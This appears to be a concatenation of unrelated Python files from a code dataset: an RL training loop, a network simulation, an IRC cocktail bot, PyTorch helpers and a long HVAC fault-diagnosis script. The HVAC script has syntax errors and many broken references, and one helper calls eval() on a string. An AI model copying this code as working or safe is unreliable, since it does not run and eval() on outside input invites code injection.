trainBatch1[2]- np.mean(trainBatch1[2]), [-1, trace_length])
# ToDo: Check that calculation of rewards and returns are correct given how they're used
if punish and time_to_punish:
sample_reward0 = -sample_reward1
else:
sample_reward0 = welfare0(sample_reward0, sample_reward1)
sample_reward1 = welfare1(sample_reward1, sample_reward0)
state_input0 = np.concatenate(trainBatch0[0], axis=0)
state_input1 = np.concatenate(trainBatch1[0], axis=0)
actions0 = np.concatenate(trainBatch0[1], axis=0)
actions1 = np.concatenate(trainBatch1[1], axis=0)
last_state = np.reshape(
np.concatenate(trainBatch1[3], axis=0),
[batch_size, trace_length, env.ob_space_shape[0],
env.ob_space_shape[1], env.ob_space_shape[2]])[:,-1,:,:,:]
# ToDo: should be option for updating punishPN if punish==True
value_0_next, value_1_next = sess.run(
[mainPN_step[0].value, mainPN_step[1].value],
feed_dict={
mainPN_step[0].state_input: last_state,
mainPN_step[1].state_input: last_state,
mainPN_step[0].lstm_state: lstm_state[0],
mainPN_step[1].lstm_state: lstm_state[1],
})
if punish:
value_coop_next = sess.run(
coopPN_step.value,
feed_dict={coopPN_step.state_input: last_state,
coopPN_step.lstm_state: lstm_coop_state}
)
# if opp_model:
# ## update local clones
# update_clone = [mainPN_clone[0].update, mainPN_clone[1].update]
# feed_dict = {
# mainPN_clone[0].state_input: state_input1,
# mainPN_clone[0].actions: actions1,
# mainPN_clone[0].sample_return: sample_return1,
# mainPN_clone[0].sample_reward: sample_reward1,
# mainPN_clone[1].state_input: state_input0,
# mainPN_clone[1].actions: actions0,
# mainPN_clone[1].sample_return: sample_return0,
# mainPN_clone[1].sample_reward: sample_reward0,
# mainPN_clone[0].gamma_array: np.reshape(discount,[1,-1]),
# mainPN_clone[1].gamma_array: np.reshape(discount,[1,-1]),
# }
# num_loops = 50 if i == 0 else 1
# for i in range(num_loops):
# sess.run(update_clone, feed_dict=feed_dict)
# theta_1_vals = mainPN[0].getparams()
# theta_2_vals = mainPN[1].getparams()
# theta_1_vals_clone = mainPN_clone[0].getparams()
# theta_2_vals_clone = mainPN_clone[1].getparams()
# if len(rList) % summary_len == 0:
# print('params check before optimization')
# print('theta_1_vals', theta_1_vals)
# print('theta_2_vals_clone', theta_2_vals_clone)
# print('theta_2_vals', theta_2_vals)
# print('theta_1_vals_clone', theta_1_vals_clone)
# print('diff between theta_1 and theta_2_vals_clone',
# np.linalg.norm(theta_1_vals - theta_2_vals_clone))
# print('diff between theta_2 and theta_1_vals_clone',
# np.linalg.norm(theta_2_vals - theta_1_vals_clone))
# Update policy networks
if punish and time_to_punish:
network_to_update = punishPN
else:
network_to_update = mainPN
feed_dict={
network_to_update[0].state_input: state_input0,
network_to_update[0].sample_return: sample_return0,
network_to_update[0].actions: actions0,
network_to_update[1].state_input: state_input1,
network_to_update[1].sample_return: sample_return1,
network_to_update[1].actions: actions1,
network_to_update[0].sample_reward: sample_reward0,
network_to_update[1].sample_reward: sample_reward1,
network_to_update[0].gamma_array: np.reshape(discount, [1, -1]),
network_to_update[1].gamma_array: np.reshape(discount, [1, -1]),
network_to_update[0].next_value: value_0_next,
network_to_update[1].next_value: value_1_next,
network_to_update[0].gamma_array_inverse:
np.reshape(discount_array, [1, -1]),
network_to_update[1].gamma_array_inverse:
np.reshape(discount_array, [1, -1]),
}
# if opp_model:
# feed_dict.update({
# mainPN_clone[0].state_input:state_input1,
# mainPN_clone[0].actions: actions1,
# mainPN_clone[0].sample_return: sample_return1,
# mainPN_clone[0].sample_reward: sample_reward1,
# mainPN_clone[1].state_input:state_input0,
# mainPN_clone[1].actions: actions0,
# mainPN_clone[1].sample_return: sample_return0, # This is what forms the target of the PNetwork
# mainPN_clone[1].sample_reward: sample_reward0,
# mainPN_clone[0].gamma_array: np.reshape(discount,[1,-1]),
# mainPN_clone[1].gamma_array: np.reshape(discount,[1,-1]),
# })
values, _, _, update1, update2 = sess.run(
[
network_to_update[0].value,
network_to_update[0].updateModel,
network_to_update[1].updateModel,
network_to_update[0].delta,
network_to_update[1].delta,
],
feed_dict=feed_dict)
update(network_to_update, lr, update1 / bs_mul, update2 / bs_mul)
updated = True
print('update params')
# Update cooperative policy network
if punish and not time_to_punish:
feed_dict = {
coopPN.state_input: state_input1,
coopPN.sample_return: sample_return0, # Assuming returns for agent 0 are given by welfare fn
coopPN.actions: actions1,
coopPN.sample_reward: sample_reward0, # Assuming returns for agent 0 are given by welfare fn
coopPN.gamma_array: np.reshape(discount, [1, -1]),
coopPN.next_value: value_coop_next,
coopPN.gamma_array_inverse:
np.reshape(discount_array, [1, -1]),
}
values, _, update_coop = sess.run(
[
coopPN.value,
coopPN.updateModel,
coopPN.delta
],
feed_dict=feed_dict)
update_single(coopPN, lr, update_coop) # ToDo: change update to accomodate None
episodes_run_counter[agent] = episodes_run_counter[agent] * 0
episodes_actions[agent] = episodes_actions[agent] * 0
episodes_reward[agent] = episodes_reward[agent] * 0
# Update punishment tracking
if punish and time_to_punish:
punish_episode_counter -= 1
if punish_episode_counter == 0:
time_to_punish = False
else:
if has_defected:
time_to_punish = True
punish_episode_counter = num_punish_episodes
if len(rList) % summary_len == 0 and len(rList) != 0 and updated:
updated = False
print(total_steps, 'reward', np.sum(rList[-summary_len:], 0))
rlog = np.sum(rList[-summary_len:], 0)
for ii in range(len(rlog)):
logger.record_tabular('rList['+str(ii)+']', rlog[ii])
logger.dump_tabular()
logger.info('')
|
23,548 | eb8138b479f0a106216041926c3e78ed4d7adbd7 | from math import floor, log
def find(list_a, list_b):
return [(index_a, index_b) for (index_a, a) in enumerate(list_a) for (index_b, b) in enumerate(list_b) if a == b]
def bin_to_dec(string):
return int(string, 2)
def dec_to_bin(i):
return bin(i)[2:]
def cut_list(list):
return list[:2**k_num(list=list)]
def k_num(list):
return floor(log(len(list), 2))
|
23,549 | 22d624f050c3661c9f39699eb439901931d3c22c | """ slotted aloha simulation through simpy """
#improting libranries
import simpy
import random
#defining constants
UPPER_LIMIT=1000
TIMEOUT=100
SLOT_TIME=10
MIN_PROCESS=10
MAX_PROCESS=20
MEAN=10
FRAME_TIME=5 #or transmission-time(time taken to generate a frame)
TOT_STATION=3
SIM_TIME=1000
SEED_VALUE=43
e=2.71828
#dfiining station
def station(env,stno,mpipe,ackpipe,timeout,upper_limit):
while upper_limit>=0:
while timeout>=0:
flag=False
t=random.randrange(0,100,SLOT_TIME)
yield env.timeout(t)
#timer at startion starts from here
print("message sent from station %d at : %f"%(stno,env.now))
message=(stno,"%d send the message at %f"%(stno,env.now))
yield env.timeout(FRAME_TIME)
timeout-=FRAME_TIME
mpipe.put(message)
while True:
if timeout<=0:
break
if ackpipe.items and (ackpipe.items[0]==stno):
ack=yield ackpipe.get()
flag=True
break
else:
yield env.timeout(1)
timeout-=1
if flag==True:
print("ack received at station %d at : %f"%(stno,env.now))
break
else:
print("timeout of station %d ,initiating retransmission at : %f"%(stno,env.now))
upper_limit-=timeout
if flag==True:
break
#defining receiver
def reciver(env,mpipe,ackpipe,mx):
#destroying packets if more than 1 at a time
k=len(mpipe.items)
if k>1:
mpipe.items=[]
print("%d packet_destroyed at %f"%(k,env.now))
message=yield mpipe.get()
print("message from station %d received at receiver : %f "%(message[0],env.now))
mx[0]=max(env.now,mx[0])
process_time=random.uniform(MIN_PROCESS,MAX_PROCESS)
yield env.timeout(process_time)
#print("station %d message's process time %f"%(message[0],process_time))
print("acknowledgement %d sent from reciver at : %f"%(message[0],env.now))
ackpipe.put(message[0])
#defining main()
def main():
random.seed(SEED_VALUE)
env=simpy.Environment()
mpipe=simpy.Store(env)
ackpipe=simpy.Store(env)
mx=[0.0]
for i in range(TOT_STATION):
env.process(station(env,i+1,mpipe,ackpipe,TIMEOUT,UPPER_LIMIT))
for i in range(TOT_STATION):
env.process(reciver(env,mpipe,ackpipe,mx))
env.run(until=SIM_TIME)
#calculating NORMALIZED CHANNEL TRAFFIC
ld=TOT_STATION/mx[0]
G=ld*FRAME_TIME
#calculating THROUGHPUT
S=G*(e**(-G))
print("\n\n")
print("NORMALIZED CHANNEL TRAFFIC : %f"%(G))
print("THROUGHPUT : %f"%(S))
if(__name__=="__main__"):
main()
|
23,550 | ff462032ad2f32e6caf5d247da3b78d6de496f04 | def reverse_elements(number_list, current_position, length):
if length <= 1:
return number_list
elif current_position + length <= len(number_list):
sub_list = number_list[current_position:current_position + length]
reversed_sublist = list(reversed(sub_list))
return number_list[0:current_position] + reversed_sublist + number_list[current_position + length:]
else:
sub_list_start = number_list[current_position:]
sub_list_end = number_list[0:length - len(sub_list_start)]
sub_list = sub_list_start + sub_list_end
reversed_sublist = list(reversed(sub_list))
return\
reversed_sublist[len(sub_list_start):]\
+ number_list[len(sub_list_end):(len(sub_list_end) + len(number_list) - length)]\
+ reversed_sublist[:len(sub_list_start)]
|
23,551 | 1a5a62ed88139f6bfa3708c1d75e9e30e7b3a1e0 |
from irc import *
from cocktaildb import *
channel = "#pbzweihander"
server = "irc.uriirc.org"
port = 16664
nickname = "bartender-bot"
irc = IRC()
def main():
global irc
irc.init()
irc.connect(server, port, channel, nickname)
while True:
lines = irc.get_text()
for text in lines:
if not text:
continue
if 'PING ' in text: # 서버에서 핑 요청시 응답
irc.raw_send('PONG ' + text.split()[1])
if 'INVITE ' in text: # 유저가 채널로 초대시 응답
irc.join(text.split(':', 2)[-1])
print("[r] " + text) # 로그
if 'PRIVMSG ' in text:
chan = text.split("PRIVMSG ")[1].split()[0]
sender = text.split("!")[0][1:]
msg = text.split(":", 2)[2]
if "#" not in chan: # 채널 메세지가 아니라 쿼리(귓속말)
chan = sender
handle(chan, msg)
def handle(chan: str, msg: str):
s = ''
if msg.startswith('c?'):
name = msg.split('?')[1].strip()
if name:
if name == 'random':
s = random_cocktails()
else:
s = find_cocktails(name)
if not s:
s = '._.'
elif msg.startswith('cs?'):
name = msg.split('?')[1].strip()
if name:
s = find_cocktails(name, True, False)
if not s:
s = '._.'
elif msg.startswith('cd?'):
name = msg.split('?')[1].strip()
if name:
s = find_cocktails(name, False, True)
if not s:
s = '._.'
elif msg.startswith('i?'):
name = msg.split('?')[1].strip()
if name:
s = find_ingredient(name)
if not s:
s = '._.'
elif msg.startswith('is?'):
name = msg.split('?')[1].strip()
if name:
s = find_ingredient(name, True, False)
if not s:
s = '._.'
elif msg.startswith('id?'):
name = msg.split('?')[1].strip()
if name:
s = find_ingredient(name, False, True)
if not s:
s = '._.'
if s:
if '\n' in s:
for l in s.split('\n'):
irc.send(chan, l)
else:
irc.send(chan, s)
if __name__ == '__main__':
main()
|
23,552 | 3f53f6cc2a3e068f9b0b37b42cc2408bc92f306e | # Copyright (c) Microsoft. All rights reserved.
import torch
import math
from torch.nn.functional import tanh, relu, prelu, leaky_relu, sigmoid, elu, selu
from torch.nn.init import uniform, normal, eye, xavier_uniform, xavier_normal, kaiming_uniform, kaiming_normal, orthogonal
def linear(x):
return x
def swish(x):
return x * sigmoid(x)
def bertgelu(x):
return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
def gptgelu(x):
return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
# default gelue
gelu = bertgelu
def activation(func_a):
"""Activation function wrapper
"""
try:
f = eval(func_a)
except:
f = linear
return f
def init_wrapper(init='xavier_uniform'):
return eval(init)
|
23,553 | 45107331f45352fc6b9ad0ecb057bd9135fe0ea1 | import sys, getopt
import os
import shutil
import re
def main(argv):
simlog = ''
startcycle = 0
endcycle = 0
try:
opts, args = getopt.getopt(argv, "hi:s:e:", ["input=", "start=", "end="])
except getopt.GetoptError:
print 'Usage: python graphSimLog.py --input sim.log --start startcycle --end endcycle'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'Usage: python graphSimLog.py --input sim.log --start startcycle --end endcycle'
sys.exit()
elif opt in ("-i", "--input"):
simlog = arg
elif opt in ("-s", "--start"):
startcycle = int(arg)
elif opt in ("-e", "--end"):
endcycle = int(arg)
logInput = open(simlog, 'r').readlines()
jsonout = open("data.json", 'w')
events = []
#We need to find all load printfs: see example below
## Cycle: 29727 Time: 594590 ListAverage_pSlice - LD 0x2000000
for line in logInput:
regex = "# Cycle:\W*([0-9]+)\W+Time:\W*[0-9]+\W*([A-z]+)\W-\W([A-z]+[0-9]*)\W+0x([A-z0-9]+)"
m = re.search(regex,line)
if m:
event_element =[]
event_element.append(int(m.group(1)))
sliceRE = "\w*_pSlice"
ms = re.search(sliceRE, m.group(2))
if ms:
event_element.append(True)
else:
event_element.append(False)
event_element.append(m.group(3))
event_element.append(m.group(4))
if startcycle != 0 or endcycle != 0:
if event_element[0] > startcycle and event_element[0] < endcycle:
events.append(event_element)
else:
events.append(event_element)
links = []
pos = 0
for event in events:
if event[1]:
addr = event[3]
ldName = event[2]
linkStart = event[0]
found = False
for linkSearch in events:
if not linkSearch[1]: #Pslice event
if addr == linkSearch[3]:
if ldName == linkSearch[2]:
if not found:
if linkSearch[0] == linkStart:
found = True
if linkSearch[0] > linkStart:
add_link =[]
add_link.append(linkStart)
add_link.append(linkSearch[0])
links.append(add_link)
found = True
#Write data.json file
outs = "{\n"
#Write out the nodes
outs += "\t\"nodes\":[\n"
for e in events:
outs += "\t\t{\"name\":\""+e[2]
if e[1]:
outs += "\",\"group\":0"
else:
outs += "\",\"group\":1"
outs += ",\"time\":"+str(e[0])
outs += ",\"addr\":\""+str(e[3])+"\""
outs += "},\n"
outs = outs[:-2]
outs += "\n\t],\n"
#write out the links
outs += "\t\"links\":[\n"
if links:
for l in links:
outs += "\t\t{\"source\":" +str(l[0])+",\"target\":"+str(l[1])+",\"value\":1},\n"
outs = outs[:-2]
outs += "\n\t],\n"
#Write out startTime and endTime
outs += "\t\"startTime\":" + str(events[0][0]) + ",\n"
outs += "\t\"endTime\":" + str(events[-1][0]) + ",\n"
outs += "\t\"startLink\":" +str(links[0][1] - links[0][0])+",\n"
outs += "\t\"endLink\":"+str(links[-1][1] - links[-1][0])+"\n"
outs += "}"
jsonout.write(outs)
jsonout.close()
python_dir = os.path.dirname(os.path.realpath(__file__))
shutil.copytree(python_dir + "/_d3graph", "./_d3graph")
shutil.move("./data.json", "./_d3graph/data.json")
if __name__ == "__main__":
main(sys.argv[1:])
|
23,554 | 8c6e41149e26d01c22988571ebfaabd3e16fd11c | import torch
import torch.nn as nn
from models.custom import SizeableModule, NamedModule, WeightInitializableModule
class MLP(SizeableModule, NamedModule, WeightInitializableModule):
"""Multi Layer Perceptron
Attributes:
fc1 (nn.Linear): First Fully connected linear layer (2*14*14) -> (128)
fc2 (nn.Linear): Second Fully connected linear layer (128) -> (98)
fc3 (nn.Linear): Third Fully connected linear layer (98) -> (49)
fc4 (nn.Linear): Fourth [Fully connected linear layer (49) -> (10)
classifier (nn.classifier):Classifier (10) -> (1)
drop (nn.drop): Dropout with p=0.2
relu (nn.ReLU): ReLu activation function
"""
def __init__(self):
super(MLP, self).__init__()
self.fc1 = nn.Linear(2 * 14 * 14, 128)
self.fc2 = nn.Linear(128, 98)
self.fc3 = nn.Linear(98, 49)
self.fc4 = nn.Linear(49, 10)
self.classifier = nn.Linear(10, 1)
# dropout layer
self.drop = nn.Dropout(0.2)
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
# Initialize weights
self.apply(self.weights_init)
def forward(self, x: torch.tensor) -> torch.tensor:
"""
Forward pass function for the global MLP
Args:
x [float32]: input images with dimension Bx2x14x14 (for batch size B)
Returns:
[int]: predicted probability ]0,1[
[float32] : predicted classe by pair, size Bx2x10
"""
# flatten image input
x = x.flatten(start_dim=1)
# add hidden layer, with relu activation function
x = self.relu(self.fc1(x))
x = self.drop(x)
x = self.relu(self.fc2(x))
x = self.drop(x)
x = self.relu(self.fc3(x))
x = self.drop(x)
x = self.fc4(x)
x = self.sigmoid(self.classifier(x))
return x.squeeze(), None
def __str__(self) -> str:
"""Representation"""
return "Multi-Layer Perceptron"
|
23,555 | 3625cdb4b7d4df54a01a8ecd2bf1f246efd8c25f | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# garvis.py
#
# Copyright 2016 David Keuchel <david.keuchel@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import time
import compare
import Tstat
import json
class Equipment(object):
def __init__(heat_type, heat_stages, timed_stages, heatBot, heatpump, cooling_stages, cooling_tonage, cooling_cfm, coolBot):
self.heat_type = heat_type
self.heat_stages = heat_stages
self.timed_stages = timed_stages
self.heatpump = heatpump
self.heatBot = heatBot
self.cooling_stages = cooling_stages
self.cooling_tonage = cooling_tonage
self.cooling_cfm = cooling_cfm
self.coolBot
def general_heat(self, t, stage):
s = stage
if self.timed_stages:
if t < 600:
s = 'low'
else:
s = 'high'
if compare.staticPressureCheck() == 'norm':
if t >= 420:
if compare.tempRiseGas(s) == 'norm':
return True
else:
# troubleshoot mode
if self.troubleshoot_gen_furn(t):
return False
else:
return True
else:
return True
else:
# troubleshoot mode
if self.troubleshoot_gen_furn(t):
return False
else:
return True
def troubleshoot_gen_furn(t):
static = ''
delta_T = ''
s = ''
if self.timed_stages:
if Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
if t < 600:
s = 'low'
else:
s = 'high'
else:
return True
else:
if Tstat.heat_read() == 'w1':
s = 'low'
elif Tstat.heat_read() == 'w2':
s = 'high'
else:
return False
static = compare.staticPressureCheck()
delta_T = compare.tempRiseGas()
if static == 'norm':
if t > 420:
if delta_T == 'norm':
return False
elif delta_T == 'low':
#error 2 - low temp rise
return True
elif delta_T == 'high':
#error 1 - filter / airflow
return True
else:
return False
else:
# error 1 - filter / airflow
return True
def troubleshoot_furnace(self, f, t):
burners = f
ind = ''
fla = ''
blo = ''
delta_T = ''
stage = ''
if self.timed_stages:
if Tstst.heat_read() == 'w2' or Tstat.heat_read() == 'w1':
if t < 600:
stage = 'low'
else:
stage = 'high'
else:
if Tstat.heat_read() == 'w1':
stage = 'low'
elif Tstat.heat_read() == 'w2':
stage = 'high'
else:
return False
if stage == True:
ind = compare.altInducerAmps(stage)
fla = compare.flameCheck()
blo = compare.altBlowerAmps('w', stage)
delta_T = compare.tempRiseGas(stage)
static = compare.staticPressureCheck()
if ind == 'norm':
if fla == 'norm':
# needs a way to tell if it lit or not
if blo == 'norm':
if delta_T == 'norm':
if static == 'norm':
return False
else:
# error 1 filter / airflow
return True
elif delta_T == 'low':
# setting error
return True
elif delta_T == 'high':
if static == 'norm':
# setting error
return True
else:
# error 1 - filter / airflow
return True
elif blo == 'low':
if delta_T == 'norm':
if static == 'norm'
# blower capacitor error
return True
else:
# error 1 airflow / filter
return True
else:
if static == 'norm':
#blower / airflow
return True
else:
#error 1 filter / airflow
return True
elif blo == 'high':
if delta_T == 'norm':
if static == 'norm':
# blower error still working
return True
else:
# blower / airflow elevated risk 1
return True
else:
if static == 'norm':
# blower error elevated risk 1
return True
else:
#blower / airflow elevated risk 2
return True
else:
# blower / board critical
return True
elif burners == True and not fla:
# flame senser error
return True
elif burners and fla == False:
# ignitor/ gas valve error
return True
else:
# ignitor/gas/flame sensor error
return True
elif ind == 'low':
if fla == 'norm':
if blo == 'norm':
if delta_T == 'norm':
if static == 'norm':
# inducer / flue error
return True
else:
# multiple errors elevated risk 1
return True
else:
if static == 'norm':
# mulitiple errors elevatied risk 1
return True
else:
# inducer / filter / airflow eleveted risk 1
return True
else:
#multiple errors elevated risk 2
return True
else:
# inducer / flue error critical
return True
elif ind == 'high':
if fla == 'norm':
if blo == 'norm':
if delta_T == 'norm':
if static == 'norm':
# inducer / flue error
return True
else:
# multiple errors elevated risk 1
return True
else:
if static == 'norm':
# mulitiple errors elevatied risk 1
return True
else:
# inducer / filter / airflow eleveted risk 1
return True
else:
#multiple errors elevated risk 2
return True
else:
# inducer / flue error critical
return True
else:
# inducer / board error critical
return True
else:
return False
def troubleshoot_condenser(self):
cond_fan = ''
compressor = ''
odt = ''
stage = ''
if Tstat.cool_read() == 'y':
stage = 'low'
elif Tstat.cool_read() == 'y2':
stage = 'high'
else:
return False
if stage == True:
odt = senscom.odt()
cond_fan = compare.cond_fan_check(stage)
compressor = compare.comp_check(stage)
if odt > 65.0:
if cond_fan == 'norm':
if compressor == 'norm':
return False
elif compressor == 'low':
#compressor issue
return True
elif compressor == 'high':
# compressor issue
else:
# power / compressor issue
return False
elif cond_fan == 'low':
#fan issue
return True
elif cond_fan == 'high':
# fan issue
return True
else:
#too cold to test properly
return True
def troubleshoot_cooling_indoor(self):
stage = ''
blower = ''
deltaT = ''
capacity = ''
static = ''
if Tstat.cool_read() == 'y':
stage = 'low'
elif Tstat.cool_read() == 'y2':
stage = 'high'
else:
return False
blower = compare.altBlowerAmps('y', stage)
deltaT = compare.tempDrop(stage)
capacity = compare.capacityCheck(self.cooling_tonage, self.cooling_cfm)
static = compare.stacicPressureCheck()
if blower == 'norm':
if deltaT == 'norm':
if capacity == 'norm':
return False
else:
if static == 'norm'
if self.coolBot:
if self.troubleshoot_condenser():
# low refrigerant
return True
else:
return False
else:
#low refrigerant / condenser issue
return True
else:
#error 1 airflow
return True
else:
if static == 'norm':
if self.coolBot:
if self.troubleshoot_condenser():
# error 1 airflow issues / clogged filter
return True
else:
pass
else:
# condenser issue
return True
else:
#airflow issue
return True
else:
# blower issue
return True
def troubleshoot_hp_indoor(self):
stage = ''
blower = ''
deltaT = ''
static = ''
if Tstat.cool_read() == 'y' and Tstat.reversing() and not Tstat.heat_read():
stage = 'low'
elif Tstat.cool_read() == 'y2' and Tstat.reversing() and not Tstat.heat_read():
stage = 'high'
elif Tstat.cool_read() and Tstat.reversing() and Tstat.heat_read():
stage = 'aux'
else:
return False
blower = compare.altBlowerAmps('y', stage)
deltaT = compare.tempRiseHp(stage)
static = compare.stacicPressureCheck()
if blower == 'norm':
if deltaT == 'norm':
return False
else:
if static == 'norm'
if self.coolBot:
if self.troubleshoot_condenser():
# low refrigerant/ defrost/ condenser issue
return True
else:
pass
else:
#low refrigerant / condenser issue
return True
else:
#airflow
return True
elif blower == 'low':
if delta_T == 'norm':
if static == 'norm':
# capacitor issue
return True
else:
# error 1 airflow / filter
return True
elif delta_T == 'high':
#error 1 airflow / filter
return True
else:
if static == 'norm':
if self.coolbot:
if self.troubleshoot_condenser():
return True
else:
# capacitor issue
return True
else:
# capacitor
return True
else:
# error 1 airflow
return True
elif blower == 'high':
if delta_T == 'norm':
if static == 'norm':
# bad blower motor still running
return True
else:
# bad motor + airflow
return True
else:
# blower / airflow
return True
else:
# blower / board
return True
def troubleshoot_geo(self):
stage = ''
blower = ''
deltaT = ''
capacity = ''
static = ''
comp = ''
pumps = ''
if Tstat.cool_read() == 'y'and not Tstat.reversing and not Tstat.heat_read():
stage = 'low'
elif Tstat.cool_read() == 'y2' and not Tstat.reversing and not Tstat.heat_read():
stage = 'high'
if Tstat.cool_read() == 'y'and Tstat.reversing and not Tstat.heat_read():
stage = 'low'
elif Tstat.cool_read() == 'y2' and Tstat.reversing and not Tstat.heat_read():
stage = 'high'
elif Tstat.cool_read() and Tstat.reversing and Tstat.heat_read():
stage = 'aux'
else:
return False
if Tstat.reversing():
deltaT = compare.tempRiseHp(stage)
else:
deltaT = compare.tempDrop(stage)
blower = compare.altBlowerAmps(stage)
capacity = compare.capacityCheck(self.cooling_tonage, self.cooling_cfm)
static = compare.staticPressureCheck()
comp = compare.comp_check(stage)
pumps = compare.pump_check()
if stage:
if pumps == 'norm':
if comp == 'norm':
if blower == 'norm':
if static == 'norm':
if deltaT == 'norm':
if not Tstat.reversing():
if capacity == 'norm':
return False
else:
# low water/ refrigerant
return True
else:
return False
else:
# low water/ refrigerant
return True
# clogged filter/ airflow restiction
return True
else:
# bad blower
return True
else:
# bad compressor
return True
else:
# bad pumps
return True
class GasFurnace(Equipment):
def __init__(self, heat_stages, timed_stages, heatBot):
super(GasFurnace, self).__init__(self, 'furnace', heat_stages, timed_stages, heatBot)
self.heat_stages = heat_stages
self.timed_stages = timed_stages
self.heatBot = heatBot
def furnaceCall(self, stage):
if self.heat_stages == '1':
self.furnace_start()
time.sleep(3)
while Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
self.furnace_stage(2)
time.sleep(1)
elif self.heat_stages == '2' and self.timed_stages == 0:
self.furnace_start()
time.sleep(3)
while Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
if Tstat.heat_read() == 'w2':
s = 2
else:
s = 1
self.furnace_stage(s)
time.sleep(1)
elif self.heat_stages == '2' and not self.timed_stages == 0:
self.furnace_start()
time.sleep(3)
t = 98
while Tstat.heat_read() == 'w1' or Tstat.heat_read() == 'w2':
self.furnace_timed(t)
time.sleep(1)
t = t + 1
def furnace_stage(self, stage):
if compare.altInducerAmps(stage) == 'norm':
if compare.flameCheck():
if compare.altBlowerAmps('w', stage) == 'norm':
if compare.tempRiseGas(stage) == 'norm':
return True
else:
# troubleshoot mode
if Equipment.troubleshoot_furnace(True):
return False
else:
return True
else:
#troubleshoot mode
if Equipment.troubleshoot_furnace(True):
return False
else:
return True
else:
#troubleshoot mode
if Equipment.troubleshoot_furnace(True):
return False
else:
return True
else:
#troubleshoot mode
if Equipment.troubleshoot_furnace(True):
return False
else:
return True
def furnace_timed(self, t):
if t < 600:
stage = 'low'
else:
stage = 'high'
if compare.altInducerAmps(stage) == 'norm':
if compare.flameCheck():
if compare.altBlowerAmps('w', stage) == 'norm':
if compare.tempRiseGas(stage) == 'norm':
return True
else:
# troubleshoot mode
if Equipment.troubleshoot_furnace(True, t):
return False
else:
#troubleshoot mode
if Equipment.troubleshoot_furnace(True, t):
return False
else:
return True
else:
#troubleshoot mode
if Equipment.troubleshoot_furnace(True, t):
return False
else:
return True
else:
#troubleshoot mode
if Equipment.troubleshoot_furnace(True, t):
return False
else:
return True
def furnace_start(self, stage):
t = 0
if compare.altInducerAmps('high') == 'norm':
while t < 30:
t = t + 1
time.sleep(1)
if compare.flameCheck():
while t < 33:
t = t + 1
time.sleep(1)
if compare.flameCheck():
while t < 95:
t = t + 1
time.sleep(1)
if compare.altBlowerAmps('w', stage) == 'norm':
return True
else:
# troubleshoot mode
if Equipment.troubleshoot_furnace(True):
return False
else:
return True
else:
# troubleshoot
if Equipment.troubleshoot_furnace(True):
return False
else:
return True
else:
# troubleshoot
if Equipment.troubleshoot_furnace(False):
return False
else:
return True
else:
#troubleshoot
if Equipment.troubleshoot_furnace(False):
return False
else:
return True
class Condenser(Equipment):
def __init__(self, heatpump, cooling_stages, cooling_tonage, cooling_cfm, coolBot):
super(Condenser, self).__init__('none', 'none', 'none', 'none', heatpump, cooling_stages, cooling_tonage, cooling_cfm, coolBot)
self.heatpump = heatpump
self.cooling_stages = cooling_stages
self.cooling_tonage = cooling_tonage
self.cooling_cfm = cooling_cfm
self.coolBot = coolBot
def cooling(self, p, stage):
t = 0
if self.coolBot == True:
time.sleep(1)
t = t + 1
if compare.condenserFan(stage) == 'norm':
time.sleep(1)
t = t + 1
if compare.compresser(stage) == 'norm':
if compare.altBlowerAmps('y', stage) == 'norm':
if p > 4:
if compare.tempDrop(stage) == 'norm':
if compare.capacityCheck(self.cooling_tonage, self.cooling_cfm) == 'norm':
return True
else:
if Equipment.troubleshoot_cooling_indoor() == True:
return False
else:
return True
else:
if Equipment.troubleshoot_cooling_indoor() == True:
return False
else:
return True
else:
return True
else:
if Equipment.troubleshoot_cooling_indoor() == True:
return False
else:
return True
else:
if Equipment.troubleshoot_cooling_indoor() == True:
return False
else:
return True
else:
if Equipment.troubleshoot_cooling_indoor() == True:
return False
else:
return True
else:
if compare.altBlowerAmps('y', stage) == 'norm':
if p > 4:
if compare.tempDrop(stage) == 'norm':
if compare.capacityCheck(self.cooling_tonage, self.cooling_cfm) == 'norm':
return True
else:
if Equipment.troubleshoot_cooling_indoor():
return False
else:
return True
else:
if Equipment.troubleshoot_cooling_indoor():
return False
else:
return True
else:
return True
else:
if Equipment.troubleshoot_cooling_indoor():
return False
else:
return True
def hp(self, p, stage):
t = 0
if self.coolBot == True:
time.sleep(1)
t = t + 1
if compare.condenserFan(stage) == 'norm':
time.sleep(1)
t = t + 1
if compare.compresser(stage) == 'norm':
if compare.altBlowerAmps('y', stage) == 'norm':
if p > 4:
if compare.tempRiseHp(stage) == 'norm':
return True
else:
if Equipment.troubleshoot_hp_indoor():
return False
else:
return True
else:
return True
else:
if Equipment.troubleshoot_hp_indoor():
return False
else:
return True
else:
if Equipment.troubleshoot_hp_indoor():
return False
else:
return True
else:
if Equipment.troubleshoot_hp_indoor():
return False
else:
return True
else:
if compare.altBlowerAmps('y', stage) == 'norm':
if p > 4:
if compare.tempRiseHp(stage) == 'norm':
return True
else:
if Equipment.troubleshoot_hp_indoor():
return False
else:
return True
else:
return True
else:
if Equipment.troubleshoot_hp_indoor():
return False
else:
return True
def geo_cool(self, p, stage):
t = 0
while t == 0:
time.sleep(1)
t = t + 1
if compare.compressor(stage) == 'norm':
if compare.altBlowerAmps('y', stage) == 'norm':
if p > 4:
if compare.tempDrop(stage) == 'norm':
if compare.capacityCheck(self.cooling_tonage, self.cooling_cfm) == 'norm':
return True
else:
if equipment.troubleshoot_geo():
return False
else:
return True
else:
if equipment.troubleshoot_geo():
return False
else:
return True
else:
return True
else:
if equipment.troubleshoot_geo():
return False
else:
return True
else:
if equipment.troubleshoot_geo():
return False
else:
return True
